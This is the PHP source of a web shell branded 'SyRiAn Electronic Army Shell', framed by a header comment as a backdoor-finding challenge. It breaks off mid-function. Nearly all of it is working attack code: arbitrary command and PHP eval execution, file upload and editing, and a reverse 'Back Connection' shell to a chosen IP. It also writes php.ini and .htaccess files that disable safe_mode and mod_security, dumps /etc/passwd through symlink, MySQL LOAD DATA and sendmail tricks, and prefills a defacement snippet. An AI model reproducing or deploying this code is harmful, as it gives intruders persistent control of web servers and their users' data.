SEA Shell - Find Backdoors

1. /*
2. MaDLeeT's Backdoor Finding Challenge
3. www.madleets.com/Thread-Find-Backdoors
4. */
5. <?php
6. # Bypass SuHosin
7. # Virtual
8. # users 6 ID /etc/passwd
9.  
10. $user = 'SEA';
11. $pass = 'SEA';
12. $uselogin = 1;
13. $sh3llColor = "green";
14.  
15. # MySQL Info ---------
16. $DBhost = "localhost";
17. $DBuser = "root";
18. $DBpass = "root";
19. #---------------------
20. session_start();
21. error_reporting(0);
22. set_magic_quotes_runtime(0);
23. set_time_limit(0);
24. ignore_user_abort(TRUE);
25. ini_restore("safe_mode");
26. ini_restore("open_basedir");
27. ini_set('max_execution_time',0);
28. ini_set('output_buffering',0);
29. ini_set('safe_mode','Off');
30.  
31. // Set Current Directory
32. if(!$_POST && !$_SESSION['curDir']) {
33.     $dir = getcwd();
34.     $_SESSION['curDir'] = $dir;
35. } else if(empty($_POST['curDir'])) {
36.     $dir = $_SESSION['curDir'];
37. } else {
38.     $dir = filter($_POST['curDir']);
39.     $_SESSION['curDir'] = $dir;
40. }
41. // Set Dir Mode
42. if($_GET['dir_mode']) {
43.     $dir_mode = $_GET['dir_mode'];
44.     $_SESSION['dir_mode'] = $dir_mode;
45. } else {
46.     $dir_mode = $_SESSION['dir_mode'];
47. }
48.  
49. // Set Usable Command
50. if($_POST['exe_method']) {
51.     $exec_method = $_POST['exe_method'];
52. } else {
53.     $exec_method = "exec";
54. }
55. # Logout
56. if($_POST['logout']) {
57.     print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
58.     print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
59. }
60. if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
61. if($_GET['info']){phpinfo();}
62. $safeMode = SafeMode();
63. $server = substr($SERVER_SOFTWARE,0,120);
64. $daemon = "";
65. ?>
66. <html>
67. <head>
68. <title>SyRiAn Electronic Army Shell :: SEA Shell</title>
69. <link rel="shortcut icon" href='http://i40.tinypic.com/2rpuped.png' />
70. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
71. <?php echo CSS($sh3llColor); ?>
72.  
73. </head>
74. <body dir='ltr'>
75. <?php
76. # ---------------------------------------#
77. #             Authentication             #
78. #----------------------------------------#
79. if ($uselogin ==1) {
80.     if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
81.         if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
82.         if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
83.             print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
84.         } else {
85.             if($_POST['usrname']){
86.                 print'<script>alert("Go and play in the street man !!");</script>';
87.             }
88. ?>
89. <br><br>
90.             <center><img src="http://i40.tinypic.com/2rpuped.png"><br />
91.             <sy>SyRiAn Electronic Army</sy>
92.             </center><br />
93.             <div align="center">
94.                 <form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
95.                 <input dir="ltr" name="usrname" id="username" value="" type="text"  size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
96.                 <input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
97.                 <input type="submit" value=" Login  " name="login" />
98.                 </form>
99.             </div>
100.             <?php
101.             footer();
102.             exit;
103.         }
104.     }
105. }
106. ?>
107. <table cellpadding='0' cellspacing='0' width='100%'>
108.     <tr>
109.         <td width='160'>
110.         <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
111.             <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://i40.tinypic.com/2rpuped.png' width='100%' height='100%'></a><br>
112.             <center>SyRiAn Electronic Army
113.             <p></p>
114.                 <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
115.                     <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
116.                     <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
117.                 </select>
118.             </center>
119.       </td>
120.       <td>
121.       <form method="post">
122. <table width='100%' style="border:none; padding:2px;" >
123.     <tr>
124.         <td width='103'>System</td>
125.         <td width="323"><?php echo $os; ?></td>
126.         <td width="90">Apache Modules</td>
127.         <td width="278"><select ><?php
128.         if(function_exists("apache_get_modules")) {
129.             foreach (apache_get_modules() as $module) {
130.                 echo "<option>".$module."</option>";
131.             }
132.         }else {
133.             echo "<option>NONE</option>";
134.         }
135.         ?></select></td>
136.     </tr>
137.     <tr>
138.       <td>uname </td>
139.       <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
140.       <td>Curl</td>
141.       <td><?php echo Curl(); ?></td>
142.     </tr>
143.     <tr>
144.         <td>pwd</td>
145.         <td><?php echo getcwd(); ?></td>
146.         <td>Open Basedir</td>
147.         <td><?php echo openBaseDir(); ?></td>
148.     </tr>
149.     <tr>
150.         <td>whoami</td>
151.         <td><?php echo get_current_user(); ?></td>
152.         <td>Magic_Quotes</td>
153.         <td><?php echo magicQouts(); ?></td>
154.     </tr>
155.         <tr>
156.           <td>Server</td>
157.           <td><?php echo $server; ?></td>
158.           <td>Register Globals</td>
159.           <td><?php echo RegisterGlobals(); ?></td>
160.         </tr>
161.         <tr>
162.           <td>Server Name</td>
163.           <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
164.           <td>Gzip</td>
165.           <td><?php echo Gzip(); ?></td>
166.         </tr>
167.         <tr>
168.           <td>Your IP</td>
169.           <td><?php echo GetRealIP(); ?></td>
170.           <td>Oracle</td>
171.           <td><?php echo Oracle(); ?></td>
172.         </tr>
173.         <tr>
174.           <td>Server IP</td>
175.           <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
176.           <td>MSQL</td>
177.           <td><?php echo MSQL(); ?></td>
178.         </tr>
179.         <tr>
180.           <td>PHP Version</td>
181.           <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
182.           <td>MySQL</td>
183.           <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
184.         </tr>
185.         <tr>
186.           <td>Safe Mode</td>
187.           <td><?php echo $safeMode; ?></td>
188.           <td>MySQLi</td>
189.           <td><?php echo MysqlI(); ?></td>
190.         </tr>
191.         <tr>
192.         <td>disable functions</td>
193.         <td><select name="disableFunctions"><?php
194.         $funArray = DisableFunctions();
195.         $funArray = explode(",",$funArray);
196.         sort($funArray);
197.         foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
198.         ?></select>
199.           <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
200.           </td>
201.         <td>MsSQL</td>
202.         <td><?php echo MsSQL(); ?></td>
203.         </tr>
204. </table>
205. &nbsp;   [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
206. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
207. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
208. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
209. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
210. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
211. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
212. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
213. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
214. <input type="submit" name="find_755" id="find_755" value="Find 755" />
215. <br>
216. </form>
217. </table>
218.  
219. <form method="post">
220. <center>
221. <textarea cols="150" rows="20" name="result" >
222. <?php
223. chdir($dir);
224. if($_POST['login'] || !$_POST){echo ScanDirs();}
225. else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
226. else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
227. else if($_POST['UPLOAD_Execute']) {
228.     for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
229.         if($_FILES['uploadfile']['name'][$i] != '') {
230.             if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
231.             else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
232.             if($upload) {echo "The File  ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
233. ";  }
234.             else { echo "The File  ".$_FILES['uploadfile']['name'][$i]."  Can't Be Upload :( !
235. ";}
236.         }
237.     }      
238. }
239. else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
240. else if($_POST['SAVE_Execute']) {
241.     $content = filter($_POST['result']);
242.     if(empty($content)){$content = " ";}
243.     if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
244. }
245. else if($_POST['READ_Execute']) {
246.     $path = urldecode(filter($_POST['READ_Line']));
247.     $file = fopen($path,'r+');
248.     if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path)));  }
249.     else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
250.     else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
251.     else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
252.     else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
253.     else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
254.     else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
255.     else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
256.     else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
257.     else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
258.     else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
259.     else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
260.     else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
261.     else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
262.     else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
263.     else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
264.     else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
265.     else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
266.     else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
267.     else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
268. }
269. else if($_POST['STOP_Execute']) {
270. $genTry = GenerateFile("php.ini","
271. safe_mode = Off
272. disable_functions = NONE
273. safe_mode_gid = OFF
274. open_basedir = OFF");
275.     if($genTry){echo "[+] php.ini Has Been Generated Successfully
276. ";}
277.     else {echo "[-] Failed to generate php.ini file !!
278. ";}
279.    
280.     $genTry = GenerateFile(".htaccess","
281. <IfModule mod_security.c>
282. SecFilterEngine Off
283. SecFilterScanPOST Off
284. SecFilterCheckURLEncoding Off
285. SecFilterCheckCookieFormat Off
286. SecFilterCheckUnicodeEncoding Off
287. SecFilterNormalizeCookies Off
288. </IfModule>
289. <Limit GET POST>
290. order deny,allow
291. deny from all
292. allow from all
293. </Limit>
294. <Limit PUT DELETE>
295. order deny,allow
296. deny from all
297. </Limit>
298. SetEnv PHPRC ".getcwd()."/php.ini
299.     ");
300.     if($genTry){echo "[+] .htaccess Has Been Generated Successfully
301. ";}
302.     else {echo "[-] Failed to generate .htaccess file !!
303. ";}
304. }
305. else if($_POST['CON_Type'] == "socks") {
306.     $sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
307.     if($sock < 0){echo "[-] failed to create socket.";}
308.     else {
309.         $result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
310.         if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
311.         else {
312.             $send_var = "\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$";
313.             socket_write($sock, $send_var, strlen($send_var));
314.             while($input = socket_read($sock, 10000)) {
315.                 socket_write($sock, shell_exec($input), 12000);
316.             }
317.         }
318.     }
319. } else if($_POST['CON_Type'] == "fsockopen") {
320.     $ip = filter(trim($_POST['ip']));
321.     $port = filter(trim($_POST['port']));
322.     if (!empty($ip)) {
323.         $con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
324.         if (!$con_fsockopen){
325.             $result = "Error: didnt connect !!!";
326.         } else {
327.             $newLine="\n";          
328.             fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
329.             fputs($con_fsockopen , system("uname -a") .$newLine );
330.             fputs($con_fsockopen , system("pwd") .$newLine );
331.             fputs($con_fsockopen , system("id") .$newLine.$newLine );
332.             while(!feof($con_fsockopen)){  
333.                 fputs ($con_fsockopen);
334.                 $one="[$";
335.                 $two="]";
336.                 $result= fgets ($con_fsockopen, 8192);
337.                 $message = $result;
338.                 fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
339.             }
340.             fclose ($con_fsockopen);
341.         }
342.     }
343. }
344. else if($_POST['USERS_1']){echo GetUsers1();}
345. else if($_POST['USERS_2']) {
346.      $array = GetUsers2();
347.      foreach($array as $line)
348.      {echo $line."
349. ";}
350. }
351. else if($_POST['USERS_3']) {
352.      $array = GetUsers3();
353.      foreach($array as $line)
354.      {echo $line."
355. ";}
356. }
357. else if($_POST['USERS_4']) {
358.      $array = GetUsers4();
359.      foreach($array as $line)
360.      {echo $line."
361. ";}
362. } else if($_POST['USERS_5']){echo GetUsers5();}
363. else if($_POST['forbidden_bypass']) {
364.     mkdir("forbidden");
365.     chdir("forbidden");
366.     $forbidden_htaccess = GenerateFile(".htaccess", "
367. DirectoryIndex sea.txt
368. HeaderName sea.txt
369. ReadmeName sea.txt
370. footerName sea.txt
371. ErrorDocument 404 /404.html
372. 404.html = Symlinked sea.txt
373. Options all
374. ForceType text/plain
375. AddType text/plain .php
376. AddType text/plain .html
377. AddHandler server-parsed .php
378. AddHandler txt .php
379.     ");
380.     if($forbidden_htaccess) {
381.         echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
382.     } else {
383.         echo "[-] error with generating .htaccess file.";
384.     }
385. } else if($_POST['find_755']) {
386.     Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
387. }
388. ?></textarea>
389. <?php
390. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
391. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
392. ";}
393. ?>
394. </center></form>
395. <table width='100%'>
396.     <tr valign="top">
397.         <td width='30%'>
398.        <!-- Command Line -->
399.        <form method='POST' enctype="multipart/form-data">
400.             <table height='72' border='0' id='Box' width="100%">
401.               <tr>
402.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
403.                     <td style="background-color:#666;padding-left:10px;">Edit File
404.                     <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
405.               </tr>
406.                 <tr>
407.                   <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
408.                 </tr>
409.             </table>
410.         </form>
411.         <!-- End Of Command Line-->
412.        
413.         </td>
414.         <td width='30%' height='30'>
415.          <!-- Command Line -->
416.          <form method='POST' enctype="multipart/form-data">
417.               <table height='72' border='0' id='Box'>
418.               <tr>
419.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
420.                 <td style="background-color:#666;padding-left:10px;">Command Line
421.                 <?php echo print_exe_method(); ?>
422.                 <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
423.                 </td>
424.             </tr>
425.                 <tr>
426.                   <td height="45" colspan="2">
427.                     <?php echo SelectCommand($os); ?>
428.                     <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
429.                   <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
430.                 </tr>
431.             </table>
432.         </form>
433.         <!-- End Of Command Line-->
434.       </td>
435.         <td width='30%' height='30' valign="top">
436.         <!-- Commands Alias-->
437.         <form method='POST' enctype="multipart/form-data">
438.             <table width='100%' height='72' border='0' id='Box'>
439.               <tr>
440.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
441.                     <td style="background-color:#666;padding-left:10px;">Upload Files             <span style="padding-left:10px;">
442.                       <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
443.                     <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
444.                     </span></td>
445.               </tr>
446.                 <tr>
447.                   <td height="45" colspan="2">
448.                   <input type='file' name='uploadfile[]'>
449.                   <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
450.                 </tr>
451.             </table>
452.         </form>
453.         <!-- End Of Commands Alias-->
454.         </td>
455.     </tr>
456. <tr valign="top">
457.         <td width='30%'>
458.        <!-- Commands Alias-->
459.        <form method='POST' enctype="multipart/form-data">
460.             <table width='100%' height='72' border='0' id='Box'>
461.               <tr>
462.               <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
463.                     <td style="background-color:#666;padding-left:10px;">PHP Eval                
464.                     <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
465.               </tr>
466.                 <tr>
467.                   <td height="45" colspan="2"><label for="PHP_Line"></label>
468.                   <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
469.     fwrite($file,"Hacked");
470.     fclose($file);';}
471.                 ?>
472.                   </textarea>
473.                   <br></td>
474.               </tr>
475.             </table>
476.         </form>
477.         <!-- End Of Commands Alias-->
478.         </td>
479.         <td width='30%' height='30'>
480.         <!-- Commands Alias-->
481.         <form method='POST' enctype="multipart/form-data">
482.         <table width='100%' height='72' border='0' id='Box'>
483.           <tr>
484.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
485.                 <td style="background-color:#666;padding-left:10px;">Read Files
486.                  
487.                   <select name="READ_Type" >
488.                     <option value="file" >file</option>
489.                     <option value="fgets" >fgets</option>
490.                     <option value="fgetss" >fgetss</option>
491.                     <option value="readfile" >readfile</option>
492.                     <option value="fread" >fread</option>
493.                     <option value="show_source" >show_source</option>
494.                     <option value="file_get_contents" >file_get_contents</option>
495.                     <option value="tempnam" >tempnam</option>
496.                     <option value="copy" >copy</option>
497.                     <option value="symlink" >Symlink</option>
498.                     <option value="mb_send_mail" >mb_send_mail</option>
499.                     <option value="highlight_file" >highlight_file</option>
500.                     <option value="curl" >Curl</option>
501.                     <option value="imap" >Imap</option>
502.                     <option value="mysql" >MySQL</option>
503.                     <option value="mysqli" >MySQLI</option>
504.                     <option value="ioncube">Ion Cube</option>
505.                     <option value="error_log">Error_Log</option>
506.                     <option value="include">Include</option>
507.                     <option value="id" >ID /etc/passwd</option>
508.                   </select>
509.                   <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
510.           </tr>
511.             <tr>
512.               <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
513.           </tr>
514.         </table>
515.         </form>
516.         <!-- End Of Commands Alias-->
517.   </td>
518.         <td width='30%' height='30' valign="top">
519.         <!-- Commands Alias-->
520.         <form method='POST' enctype="multipart/form-data">
521.         <table width='100%' height='72' border='0' id='Box'>
522.           <tr>
523.           <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
524.                 <td style="background-color:#666;padding-left:10px;">Back Connection
525.                 <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
526.           </tr>
527.             <tr>
528.               <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
529.               <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
530.               <select name="CON_Type" >
531.                 <option value="socks">SOCKS</option>
532.                 <option value="fsockopen">FSOCKOPEN</option>
533.               </select>
534.               </td>
535.             </tr>
536.         </table>
537.         </form>
538.         <!-- End Of Commands Alias-->
539.         </td>
540.     </tr>
541. </table>
542. <?php
543. function IncludeReader($path) {
544.     global $os;
545.     if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
546.     $fileName = substr(strrchr($path,$slash),1);
547.     $includePath = substr($path,0,strpos($path,$fileName,0));
548.     ini_set("include_path",$includePath);
549.     include($fileName);
550. }
551. function GetUsers1() {
552.     return Exe('ls /var/mail');
553. }
554. function GetUsers2() {
555.     $array = array();
556.     $lines = file("/etc/passwd");
557.     foreach($lines as $nr=>$val) {
558.         $str = explode(":",$val);
559.         array_push($array,$str[0]);
560.     }
561.     return $array;
562. }
563. function GetUsers3() {
564.     $array = array();
565.     if ($dh = opendir("/home/"))  {
566.         while (($file = readdir($dh)) !== false)  {
567.             array_push($array,$file);
568.         }
569.         closedir($dh);
570.         return $array;
571.     }
572. }
573. function GetUsers4() {
574.     $dir = "/home/";
575.     $array = array();
576.      if ($dh = opendir($dir)) {
577.         $f = readdir($dh);
578.         while (($f = readdir($dh)) !== false) {
579.             $dh2=opendir($dir."/");
580.             $f2 = readdir($dh2);
581.             while (($f2 = readdir($dh2)) !== false) {
582.                 $f2.="/";
583.                 $dh3=opendir($dir.$f.$f2);
584.                 $f3 = readdir($dh3);
585.                 while (($f3 = readdir($dh3)) !== false) {
586.                     array_push($array,$f3);
587.                 }
588.             }
589.         }
590.         closedir($dh);
591.         return $array;
592.      } 
593. }
594. function GetUsers5(){
595.     return realpath('/etc/passwd');
596. }
597. function ErrorLog($path){
598.     $tempFile = uniqid();
599.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
600.     error_log(file_get_contents($path), 3, $tempFile);
601.     $content = file_get_contents($tempFile);
602.     unlink($tempFile);
603.     return $content;   
604. }
605. function SymlinkF($path) {
606.     $tempFile = uniqid();
607.     if(function_exists('symlink')) {
608.         symlink($path,$tempFile);
609.         $content = file_get_contents($tempFile);
610.         unlink($tempFile);
611.         return $content;
612.     }
613. }
614. function MySQLReader($path) {
615.     global $DBhost,$DBuser,$DBpass;
616.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
617.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
618.     mysql_query("CREATE DATABASE a");
619.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
620.     mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
621.     mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
622.     $result = mysql_query("SELECT a FROM a.a");
623.     while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
624.     mysql_query("DROP DATABASE a");
625. }
626. function MySQLIReader($path) {
627.     global $DBhost,$DBuser,$DBpass;
628.     if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
629.     $con = mysql_connect($DBhost,$DBuser,$DBpass);
630.     mysql_query("CREATE DATABASE a");
631.     mysql_query("CREATE TABLE a.a (a varchar(1024))");
632.    
633.     function r($fp, &$buf, $len, &$err) {
634.       print fread($fp, $len);
635.     }
636.     $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
637.     $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
638.     $m->set_local_infile_handler("r");
639.     $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
640.     $m->close();
641. }
642. function DBConnect($host,$user,$pass,$db) {
643.     $connect = mysql_pconnect($host,$user,$pass);
644.     if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false;  }
645.     else {
646.         $tryToSelectDB = mysql_select_db($db,$connect);
647.         if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false;      }
648.         else{return true; return $connect;}
649.     }
650. }
651. function ReadId($path) {
652.     for($uid=0;$uid<60000;$uid++) {  
653.         $ara = posix_getpwuid($uid);
654.         if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
655.         }
656.     }
657.     return $content;
658. }
659. function ImapF($path) {
660.     $stream = imap_open($path, "", "");
661.     $str = imap_body($stream, 1);
662.     imap_close($stream);
663.     return $str;
664. }
665. function FileF($path) {
666.     $lines = file($path); foreach($lines as $line){$content .= $line;}
667.     return $content;
668. }
669. function CopyF($path) {
670.     $tempFile = md5(uniqid()).".bb";
671.     copy($path,$tempFile);
672.     $content = file_get_contents($tempFile);
673.     unlink($tempFile);
674.     return $content;
675. }
676. function fgetssF($path) {
677.     while(($line = fgetss($path)) != false){$content .= $line;}
678.     return $content;
679. }
680. function highlightFile($path) {
681.     return highlight_file($path);
682. }
683. function mbSendEmail($path) {
684.     if(function_exists('mb_send_mail')) {
685.         $tempFile = uniqid();
686.         $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
687.         mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
688.         $content = file_get_contents($tempFile);
689.         unlink($tempFile);
690.         return $content;
691.     }
692. }
693. function DeleteFile($fileName) {
694.     global $os;
695.     if(function_exists('unlink'))
696.     {$delete = unlink($fileName);}
697.     if((!$delete) && ($os == 'Windows'))
698.     {$delete = Exe("del $fileName"); }
699.     else if((!$delete) && ($os == 'Linux'))
700.     {$delete = Exe("rm -f $fileName");}
701.     if($delete){return true;}else{return false;}
702. }
703. function CurlFileRead($path) {
704.     $ch = curl_init("file://".$path."\x00".__FILE__);
705.     var_dump(curl_exec($ch));
706. }
707. function FReadF($path) {
708.     $file = fopen($path,'r+'); //Open The File
709.     if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
710.     fclose($file);
711. }
712. function TempnameF($path) {
713.     global $dir;
714.     $temp = tempnam($dir, "cx");
715.     if(copy("compress.zlib://".$path, $temp)) {
716.         $handler = fopen($temp, "r");
717.         $readFile = fread($handler, @filesize($temp));
718.         fclose($handler);
719.         $content .= htmlspecialchars($filename);
720.         $content .= nl2br(htmlspecialchars($readFile));
721.         $content .= htmlspecialchars($filename);
722.         unlink($temp);
723.         return $content;
724.     }  
725. }
726. function Evaluation($eval) {
727.     $eval = str_replace(array("<?php","<?","?>"),"",$eval);
728.     $eval = eval($eval);
729.     if($eval){return true;}else{return false;}
730. }
731. function Oracle() {
732.     if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
733.     else {$oracle = '<font color="green">OFF</font>';}return $oracle;
734. }
735. function MsSQL() {
736.     if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
737.     else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
738. }
739. function MySQL2() {
740.     $mysql_try = function_exists('mysql_connect');
741.     if($mysql_try){$mysql = '<font color="red">ON</font>';}
742.     else {$mysql = '<font color="green">OFF</font>';}return $mysql;
743. }
744. function MSQL() {
745.     if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
746.     else {$mSql = '<font color="green">OFF</font>';}return $mSql;
747. }
748. function MysqlI() {
749.     if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
750.     else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
751. }
752. function Gzip() {
753.     if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
754.     else {$gzip = '<font color="green">OFF</font>';}return $gzip;
755. }
756. function openBaseDir() {
757.     $openBaseDir = ini_get("open_basedir");
758.     if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
759.     else {$openBaseDir = '<font color="red">ON</font>';}   
760.     return $openBaseDir;
761. }
762. function Curl() {
763.     if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
764.     else{$curl = '<font color="green">OFF</font>';}return $curl;
765. }
766. function magicQouts() {
767.     if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
768.     if (empty($mag)){$mag = '<font color="green">OFF</font>';}
769.     else {$mag= '<font color="red">ON</font>';}return $mag;
770. }
771. function SafeMode() {
